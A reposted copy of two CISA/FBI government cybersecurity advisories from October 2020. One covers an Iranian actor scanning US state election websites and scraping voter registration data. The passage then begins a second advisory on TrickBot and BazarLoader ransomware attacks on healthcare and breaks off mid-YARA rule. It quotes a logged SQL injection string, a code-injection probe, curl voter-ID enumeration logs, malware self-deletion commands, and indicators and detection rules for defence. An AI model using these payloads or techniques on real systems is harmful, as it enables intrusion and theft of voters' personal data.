Month: October 2020

alerts

AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

Post author By admin
Post date October 30, 2020

Original release date: October 30, 2020 | Last revised: November 3, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 8 framework. See the <a href=”https://attack.mitre.org/versions/v8/techniques/enterprise/”>ATT&CK for Enterprise version 8</a> for all referenced threat actor techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020. <fn value=”1″>This disinformation (hereinafter, “the propaganda video”) was in the form of a video purporting to misattribute the activity to a U.S. domestic actor and implies that individuals could cast fraudulent ballots, even from overseas. https://www.odni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security. </fn> (Reference FBI FLASH message <a href=”https://www.ic3.gov/Media/News/2020/201030.pdf”>ME-000138-TT</a>, disseminated October 29, 2020). Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. presidential election.</p>

<p>Click <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A-Iranian_Advanced_Persistent_Threat_Actor_Identified_Obtaining_Voter_Registration_Data.pdf”>here</a> for a PDF version of this report.</p>
<h3>Technical Details</h3><p>Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (<em>Active Scanning: Vulnerability Scanning</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1595/002/”>T1595.002</a>]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior. </p>

<p>Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (<em>Exploit Public-Facing Application</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1190/”>T1190</a>]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites. </p>

<p>CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. A review of the records that were copied and obtained reveals the information was used in the propaganda video. </p>

<p>CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (<em>Compromise Infrastructure</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1584/”>T1584</a>]) within a similar timeframe, use of IP addresses and IP ranges<span style=”font-size:11.0pt”><span style=”line-height:115%”><span style=”font-family:"Arial",sans-serif”>—</span></span></span>including numerous virtual private network (VPN) service exit nodes—which correlate to this Iran APT actor (<em>Gather Victim Host Information</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1592/”>T1592</a>)]), and other investigative information. </p>

<h2>Reconnaissance</h2>

<p>The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (<em>Search Open Websites and Domains</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1593″>T1593</a>]). The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites. </p>

<p>The FBI also has information indicating the actor researched  the following information in a suspected attempt to further their efforts to survey and exploit state election websites.</p>

<ul>
<li>YOURLS exploit</li>
<li>Bypassing ModSecurity Web Application Firewall</li>
<li>Detecting Web Application Firewalls</li>
<li>SQLmap tool</li>
</ul>

<h3>Acunetix Scanning</h3>

<p>CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (<em>Active Scanning: Vulnerability Scanning</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1595/002/”>T1595.002</a>]). </p>

<p>The actor used the scanner to attempt SQL injection into various fields in <code>/registration/registration/details</code> with status codes 404 or 500.</p>

<p><code>/registration/registration/details?addresscity=-1 or 3*2<(0+5+513-513) — &addressstreet1=xxxxx&btnbeginregistration=begin voter registration&btnnextelectionworkerinfo=next&btnnextpersonalinfo=next&btnnextresdetails=next&btnnextvoterinformation=next&btnsubmit=submit&chkageverno=on&chkageveryes=on&chkcitizenno=on&chkcitizenyes=on&chkdisabledvoter=on&chkelectionworker=on&chkresprivate=1&chkstatecancel=on&dlnumber=1&dob=xxxx/x/x&email=sample@email.tst&firstname=xxxxx&gender=radio&hdnaddresscity=&hdngender=&last4ssn=xxxxx&lastname=xxxxxinjjeuee&mailaddresscountry=sample@xxx.xxx&mailaddressline1=sample@email.tst&mailaddressline2=sample@xxx.xxx&mailaddressline3=sample@xxx.xxx&mailaddressstate=aa&mailaddresszip=sample@xxxx.xxx&mailaddresszipex=sample@xxx.xxx&middlename=xxxxx&overseas=1&partycode=a&phoneno1=xxx-xxx-xxxx&phoneno2=xxx-xxx-xxxx&radio=consent&statecancelcity=xxxxxxx&statecancelcountry=usa&statecancelstate=XXaa&statecancelzip=xxxxx&statecancelzipext=xxxxx&suffixname=esq&txtmailaddresscity=sample@xxx.xxx</code></p>

<h3>Requests</h3>

<p>The actor used the following requests associated with this scanning activity.</p>

<p><code>2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 – x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 200 0 0 0</code></p>

<p><code>2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 – x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 200 0 0 1375</code></p>

<p><code>2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 – X.X.x.x </code></p>

<h3>User Agents Observed</h3>

<p>CISA and FBI have observed the following user agents associated with this scanning activity.</p>

<p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 500 0 0 0 </code></p>

<p><code>Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4 </code></p>

<p><code>Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17</code></p>

<h2>Exfiltration</h2>

<h3>Obtaining Voter Registration Data</h3>

<p>Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success [<em>Gather Victim Identity Information</em> (<a href=”https://attack.mitre.org/versions/v8/techniques/T1593/”>T1589</a>)]. A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.<br />
Requests</p>

<p>The actor used the following requests.</p>

<p><code>2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 – x.x.x.x curl/7.55.1 – 200 0 0 1406</code></p>

<p><code>2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 – x.x.x.x curl/7.55.1 – 200 0 0 1390</code></p>

<p><code>2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 – x.x.x.x curl/7.55.1 – 200 0 0 1625</code></p>

<p><code>2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 – x.x.x.x curl/7.55.1 – 200 0 0 1390</code></p>

<p>Note: incrementing <code>voterid </code>values in <code>cs_uri_query field</code></p>

<h3>User Agents</h3>

<p>CISA and FBI have observed the following user agents.</p>

<p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 500 0 0 0 <br />
Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4</code></p>

<p>See figure 1 below for a timeline of the actor’s malicious activity.</p>

<p class=”text-align-center”><em>Figure 1: Overview of malicious activity</em></p>
<h3>Mitigations</h3><h2>Detection</h2>

<h3>Acunetix Scanning</h3>

<p>Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.</p>

<ul>
<li><code>$acunetix</code></li>
<li><code>acunetix_wvs_security_test</code></li>
</ul>

<h3>Indicators of Compromise</h3>

<p>For a downloadable copy of IOCs, see <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A.stix.xml”>AA20-304A.stix</a>.</p>

<p><strong>Disclaimer:</strong> <em>many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. This creates the potential for a significant number of false positives; only activity listed in this advisory warrants further investigation. The actor likely uses various IP addresses and VPN services.</em></p>

<p>The following IPs have been associated with this activity.</p>

<ul>
<li>102.129.239[.]185 (Acunetix Scanning)</li>
<li>143.244.38[.]60 (Acunetix Scanning and cURL requests)</li>
<li>45.139.49[.]228 (Acunetix Scanning)</li>
<li>156.146.54[.]90 (Acunetix Scanning)</li>
<li>109.202.111[.]236 (cURL requests)</li>
<li>185.77.248[.]17 (cURL requests)</li>
<li>217.138.211[.]249 (cURL requests)</li>
<li>217.146.82[.]207 (cURL requests)</li>
<li>37.235.103[.]85 (cURL requests)</li>
<li>37.235.98[.]64 (cURL requests)</li>
<li>70.32.5[.]96 (cURL requests)</li>
<li>70.32.6[.]20 (cURL requests)</li>
<li>70.32.6[.]8 (cURL requests)</li>
<li>70.32.6[.]97 (cURL requests)</li>
<li>70.32.6[.]98 (cURL requests)</li>
<li>77.243.191[.]21 (cURL requests and FDM+3.x [Free Download Manager v3] enumeration/iteration)</li>
<li>92.223.89[.]73 (cURL requests)</li>
</ul>

<p>CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.</p>

<ul>
<li>195.181.170[.]244 (Observed September 30 and October 20, 2020)</li>
<li>102.129.239[.]185 (Observed September 30, 2020)</li>
<li>104.206.13[.]27 (Observed September 30, 2020)</li>
<li>154.16.93[.]125 (Observed September 30, 2020)</li>
<li>185.191.207[.]169 (Observed September 30, 2020)</li>
<li>185.191.207[.]52 (Observed September 30, 2020)</li>
<li>194.127.172[.]98 (Observed September 30, 2020)</li>
<li>194.35.233[.]83 (Observed September 30, 2020)</li>
<li>198.147.23[.]147 (Observed September 30, 2020)</li>
<li>198.16.66[.]139(Observed September 30, 2020)</li>
<li>212.102.45[.]3 (Observed September 30, 2020)</li>
<li>212.102.45[.]58 (Observed September 30, 2020)</li>
<li>31.168.98[.]73 (Observed September 30, 2020)</li>
<li>37.120.204[.]156 (Observed September 30, 2020)</li>
<li>5.160.253[.]50 (Observed September 30, 2020)</li>
<li>5.253.204[.]74 (Observed September 30, 2020)</li>
<li>64.44.81[.]68 (Observed September 30, 2020)</li>
<li>84.17.45[.]218 (Observed September 30, 2020)</li>
<li>89.187.182[.]106 (Observed September 30, 2020)</li>
<li>89.187.182[.]111 (Observed September 30, 2020)</li>
<li>89.34.98[.]114 (Observed September 30, 2020)</li>
<li>89.44.201[.]211 (Observed September 30, 2020)</li>
</ul>

<h2>Recommendations</h2>

<p>The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors: </p>

<ul>
<li>Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. The types of attacks possibly prevented include SQL injection, Cross Site Scripting (XSS), and command injection.</li>
<li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li>
<li>Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.</li>
<li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li>
<li>Apply multi-factor authentication, when possible.</li>
<li>Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.</li>
<li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.</li>
<li>When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.</li>
<li>Ensure third parties that require RDP access follow internal remote access policies.</li>
<li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li>
<li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as a VPNs. However, recognize the security of VPNs matches the security of the connected devices.</li>
<li>Use security features provided by social media platforms; use <a href=”https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords”>strong passwords</a>, change passwords frequently, and use a different password for each social media account. </li>
<li>See CISA’s Tip on <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Best Practices for Securing Election Systems</a> for more information. </li>
</ul>

<h3>General Mitigations</h3>

<p><em><strong>Keep applications and systems updated and patched</strong></em></p>

<p>Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed of threat actors to create new exploits following the release of  a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. <fn value=”2″>NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Additionally, use tools (e.g., the OWASP Dependency-Check Project tool <fn value=”3″>https://owasp.org/www-project-dependency-check/</fn>) to identify the publicly known vulnerabilities in third-party libraries depended upon by the application.</p>

<p><em><strong>Scan web applications for SQL injection and other common web vulnerabilities</strong></em></p>

<p>Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. <fn value=”4″>https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm</fn> Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.</p>

<p><em><strong>Deploy a web application firewall  </strong></em></p>

<p>Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools. </p>

<p><em><strong>Deploy techniques to protect against web shells</strong></em></p>

<p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. <fn value=”5″>NSA & ASD “CyberSecurity Information: Detect and Prevent Web Shell Malware” https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF</fn> Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools. </p>

<p><em><strong>Use multi-factor authentication for administrator accounts</strong></em></p>

<p>Prioritize protection for accounts with elevated privileges, remote access, or used on high-value assets. <fn value=”6″>https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs</fn> Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). <fn value=”7″>NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p>

<p><em><strong>Remediate critical web application security risks</strong></em></p>

<p>First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. Follow available guidance on securing web applications. <fn value=”8″>NSA “Building Web Applications – Security for Developers” https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm</fn> <fn value=”9″>https://owasp.org/www-project-top-ten/</fn> <fn value=”10″>https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html</fn></p>

<h2>How do I respond to unauthorized access to election-related systems?</h2>

<h3>Implement your security incident response and business continuity plan</h3>

<p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p>

<h3>Contact CISA or law enforcement immediately </h3>

<p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href=”https://us-cert.cisa.govmailto:Central@cisa.gov”>Central@cisa.gov</a> or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division (<a href=”https://us-cert.cisa.govmailto:CyWatch@ic.fbi.gov”>CyWatch@ic.fbi.gov</a> or 855-292-3937).</p>

<h2>Resources</h2>

<ul>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Best Practices for Securing Election Systems</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST16-001″>Securing Voter Registration Data </a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-006″>Website Security </a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>Avoiding Social Engineering and Phishing Attacks</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>Securing Network Infrastructure Devices</a> </li>
<li>Joint Advisory: <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li>CISA Insights: <a href=”https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf”>Actions to Counter Email-Based Attacks on Election-related Entities</a> </li>
<li>FBI and CISA Public Service Announcement (PSA): <a href=”https://ic3.gov/Media/Y2020/PSA201002″>Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA201001″>Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a> </li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200930″>Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a> </li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200928″>False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200924″>Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a> </li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200922″>Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Result</a></li>
</ul>

<p> </p>
<h3>Revisions</h3>
<ul> <li>October 30, 2020: Initial Version</li> <li>November 3, 2020: Updated IOC disclaimer to emphasize that only activity listed in this alert warrants further investigation.</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy & Use</a> policy.</p>

</div>

alerts

AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector

Post author By admin
Post date October 28, 2020

Original release date: October 28, 2020 | Last revised: November 2, 2020<br/><h3>Summary</h3><p><strong><em>This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection.</em></strong></p>

<p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the <a href=”https://attack.mitre.org/versions/v7/techniques/enterprise/”>ATT&CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health (HPH) Sector to infect systems with ransomware, notably Ryuk and Conti, for financial gain.</p>

<p>CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.</p>

<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf”>Click here</a> for a PDF version of this report.</p>

<h4>Key Findings</h4>

<ul>
<li>CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.</li>
<li>These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.</li>
</ul>
<h3>Technical Details</h3><h3>Threat Details</h3>

<p>The cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders—like TrickBot and BazarLoader (or BazarBackdoor)—as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim’s machine.</p>

<h4>TrickBot</h4>

<p>What began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.</p>

<p>In early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims—such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created <code>anchor_dns</code>, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.</p>

<p><code>anchor_dns</code> is a backdoor that allows victim machines to communicate with C2 servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. <code>anchor_dns</code> uses a single-byte <code>XOR</code> cipher to encrypt its communications, which have been observed using key <code>0xB9</code>. Once decrypted, the string <code>anchor_dns</code> can be found in the DNS request traffic.</p>

<h4>TrickBot Indicators of Compromise</h4>

<p>After successful execution of the malware, TrickBot copies itself as an executable file with a 12-character randomly generated file name (e.g. <code>mfjdieks.exe</code>) and places this file in one of the following directories.</p>

<ul>
<li>C:Windows</li>
<li>C:WindowsSysWOW64</li>
<li>C:Users[Username]AppDataRoaming</li>
</ul>

<p>Once the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (32 or 64 bit instruction set), to the infected host’s <code>%APPDATA%</code> or <code>%PROGRAMDATA%</code> directory, such as <code>%AppDataRoamingwinapp</code>. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., <code>importDll32</code> or <code>importDll64</code>):</p>

<ul>
<li><code>Systeminfo</code></li>
<li><code>importDll</code></li>
<li><code>outlookDll</code></li>
<li><code>injectDll </code>with a directory (ex. <code>injectDLL64_configs</code>) containing configuration files:
<ul>
<li><code>dinj</code></li>
<li><code>sinj</code></li>
<li><code>dpost</code></li>
</ul>
</li>
<li><code>mailsearcher</code> with a directory (ex. <code>mailsearcher64_configs</code>) containing configuration file:
<ul>
<li><code>mailconf</code></li>
</ul>
</li>
<li><code>networkDll</code> with a directory (ex. networkDll64_configs) containing configuration file:
<ul>
<li><code>dpost</code></li>
</ul>
</li>
<li><code>wormDll</code></li>
<li><code>tabDll</code></li>
<li><code>shareDll</code></li>
</ul>

<p>Filename <code>client_id</code> or <code>data </code>or <code>FAQ </code>with the assigned bot ID of the compromised system is created in the malware directory. Filename <code>group_tag</code> or <code>Readme.md</code> containing the TrickBot campaign IDs is created in the malware directory.</p>

<p>The malware may also drop a file named <code>anchorDiag.txt</code> in one of the directories listed above.</p>

<p>Part of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded <code>GUID</code>. The <code>GUID </code>is composed of <code>/GroupID/ClientID/</code> with the following naming convention:</p>

<p><code>/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/</code>.</p>

<p>The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.</p>

<p><code>[random_folder_name_in_%APPDATA%_excluding_Microsoft]</code></p>

<p><code>autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)</code>.</p>

<p>After successful execution, <code>anchor_dns</code> further deploys malicious batch scripts (<code>.bat</code>) using PowerShell commands.</p>

<p>The malware deploys self-deletion techniques by executing the following commands.</p>

<ul>
<li><code>cmd.exe /c timeout 3 && del C:Users[username][malware_sample]</code></li>
<li><code>cmd.exe /C PowerShell “Start-Sleep 3; Remove-Item C:Users[username][malware_sample_location]”</code></li>
</ul>

<p>The following domains found in outbound DNS records are associated with <code>anchor_dns</code>.</p>

<ul>
<li><code>kostunivo[.]com</code></li>
<li><code>chishir[.]com</code></li>
<li><code>mangoclone[.]com</code></li>
<li><code>onixcellent[.]com</code></li>
</ul>

<p>This malware used the following legitimate domains to test internet connectivity.</p>

<ul>
<li><code>ipecho[.]net</code></li>
<li><code>api[.]ipify[.]org</code></li>
<li><code>checkip[.]amazonaws[.]com</code></li>
<li><code>ip[.]anysrc[.]net</code></li>
<li><code>wtfismyip[.]com</code></li>
<li><code>ipinfo[.]io</code></li>
<li><code>icanhazip[.]com</code></li>
<li><code>myexternalip[.]com</code></li>
<li><code>ident[.]me</code></li>
</ul>

<p>Currently, there is an open-source tracker for TrickBot C2 servers located at <a href=”https://feodotracker.abuse.ch/browse/trickbot/”>https://feodotracker.abuse.ch/browse/trickbot/</a>.</p>

<p>The <code>anchor_dns</code> malware historically used the following C2 servers.</p>

<h4>TrickBot YARA Rules</h4>

<div class=”special_container”>rule anchor_dns_strings_filenames {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS samples based off strings or filenames used in malware”<br />
        author = “NCSC”<br />
        hash1 = “fc0efd612ad528795472e99cae5944b68b8e26dc”<br />
        hash2 = “794eb3a9ce8b7e5092bb1b93341a54097f5b78a9″<br />
        hash3 = “9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2″<br />
        hash4 = “24d4bbc982a6a561f0426a683b9617de1a96a74a”<br />
    strings:<br />
        $ = “,Control_RunDLL x00″<br />
        $ = “:$GUID” ascii wide<br />
        $ = “:$DATA” ascii wide<br />
        $ = “/1001/”<br />
        $ = /(x00|xCC)qwertyuiopasdfghjklzxcvbnm(x00|xCC)/<br />
        $ = /(x00|xCC)QWERTYUIOPASDFGHJKLZXCVBNM(x00|xCC)/<br />
        $ = “start program with cmdline “%s””<br />
        $ = “Global\fde345tyhoVGYHUJKIOuy”<br />
        $ = “ChardWorker::thExecute: error registry me”<br />
        $ = “get command: incode %s, cmdid “%s”, cmd “%s””<br />
        $ = “anchorDNS”<br />
        $ = “Anchor_x86″<br />
        $ = “Anchor_x64″<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_icmp_transport {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS samples based off ICMP transport strings”<br />
        author = “NCSC”<br />
        hash1 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
    strings:<br />
        $ = “reset_connection <- %s”<br />
        $ = “server_ok <- %s (packets on server %s)”<br />
        $ = “erase successfully transmitted packet (count: %d)”<br />
        $ = “Packet sended with crc %s -> %s”<br />
        $ = “send data confimation to server(%s)”<br />
        $ = “data recived from <- %s”<br />
        $ = “Rearmost packed recived (id: %s)”<br />
        $ = “send poll to server -> : %s”<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_config_dexor {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)”<br />
        author = “NCSC”<br />
        hash1 = “d0278ec015e10ada000915a1943ddbb3a0b6b3db”<br />
